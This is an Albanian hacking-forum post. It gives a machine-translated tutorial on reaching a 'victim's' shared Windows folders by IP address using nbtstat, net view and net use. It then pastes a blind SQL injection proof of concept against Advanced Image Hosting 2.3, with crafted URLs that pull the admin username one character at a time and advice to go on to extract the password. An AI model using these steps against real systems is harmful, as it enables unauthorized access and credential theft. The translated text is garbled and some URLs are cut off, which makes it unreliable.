Mesa duket nuk jeni i regjistruar, kliko ne butonin Regjisrohu nqs dëshironi të bëheni pjesë e forumit tonë, per t'u regjistruar ju hargjoni maksimumi 1 min kohë. Me respekt Staffi. 
ForumPortaliCalendarPytësoriKërkoLista AnëtarëveGrupet e AnëtarëveRegjistrohuidentifikimiChatBilardo

Share | 
 

 Sulmo IP permes DOS-it

Shko poshtë 
AutoriMesazh
NoIsY
Super moderator
Super moderator


Postimet : 454
Vendodhja : n'Kamenic
Puna / Hobi : Hacker

MesazhTitulli: Sulmo IP permes DOS-it   Wed Dec 16, 2009 6:28 am

Sulmo IP permes DOS-it
Kliko Start -> Run -> cmd


Lloji vijuese në Dos Prompt


-A Nbtstat IP adresa [p.sh.: nbtstat-A 207.175.1.1]


Kjo do t'ju japë një lexoni se duket si kjo
NetBIOS Remote Machine Name Tabela

____________________________________
Name Type Status
------------------------------------
abhi <00> Unique Registered
PUNA <00> Regjistruar GRUPE
abhi <03> Unique Registered
abhi <20> Unique Registered
PUNA <1E> Regjistruar GRUPE
PUNA <1d> Unique Registered
__MSBROWSE__. <01> Regjistruar GRUPE
____________________________________

Numrat në <> magjistare kodi janë vlerat. Ajo që ne po
interesuar në të është \"Kodi magjistare\" numri i <20>.
Një magji e kodit <20> do të thotë që ju kanë fotografi dhe u kthye në printer sharing.


Hapi tjetër është për të gjetur atë që është e përbashkët. Kjo është se si: --


Net view \ \
[e.g: net view \ \ 207.175.1.1]


Ju pastaj do të merrni një përgjigje se duket diçka e tillë.
Përbashkët të burimeve në \ \ ip_address
Lloji Sharename Koment

________________________________
MY DOCUMENTS Disk TEMP Disk
________________________________


(I komandës u përfundua me sukses.)

Kjo tregon se ju ka viktima potenciale tuaj tyre e mia
Dokumentet Dosjen e tyre të përbashkët dhe e përkohshme për të përbashkët.
Për atëherë ju duhet të merrni qasje në këto dosje e ardhshëm do të komandës.

Net përdorimin x: \ \ \ temp
[e.g: neto përdorimin x: \ \ 207.175.1.1 \ temp]

Nëse të gjitha shkon mirë për ju, pastaj ju do të merrni një përgjigje të
(I komandës u përfundua me sukses.)
Open my computer tuaj ju do të shihni viktimë e temp folder atje...
************************************************** **********************************************
Advanced Image Hosting (AIH) 2.3 (gal) Blind SQL Injection Vuln
[!] AIH Blind SQL Injection.

PoC / Live Demo:
-------------
http://yabsoft.info/demo/aihspro/gal...*/concat(admin, 0 x3a, pass)/**/from/**/setting/**/limit/**/0, 1), 1, 1))>100--++


First charcter of the username is char(100) --> char="d"
-------------
http://yabsoft.info/demo/aihspro/gal...*/concat(admin, 0x3a, pass)/**/from/**/setting/**/limit/**/0, 1), 2, 1))>101--++

Second charter of the username is char(101) --> char2="e"
-------------
http://yabsoft.info/demo/aihspro/gal...*/concat(admin, 0x3a, pass)/**/from/**/setting/**/limit/**/0, 1), 3, 1))>109--++

Next charter of the username is char(109) --> char3="m"
-------------
http://yabsoft.info/demo/aihspro/gal...*/concat(admin, 0x3a, pass)/**/from/**/setting/**/limit/**/0, 1), 4, 1))>111--++

And The last charter of the username is char(111) --> char4="o"
-------------
Like we see the username is "demo" now you can continue finding another
charters for password, changing the number of charters 5, 6, 7, 8, 9,
10........?>__________________
Mbrapsht në krye Shko poshtë
Shiko profilin e anëtarit http://www.deshira-juaj.tk/
 
Sulmo IP permes DOS-it
Mbrapsht në krye 
Faqja 1 e 1
 Similar topics
-
» Letrat (Tarot)
» Tmerri i së mirës!
» Shërimi Okult
» Grafologjia
» Si ta kuptojmë dhe njohim intuitën tonë?

Drejtat e ktij Forumit:Ju nuk mund ti përgjigjeni temave të këtij forumi
 :: Paneli i Kontrollit :: HaCkinG-
Kërce tek: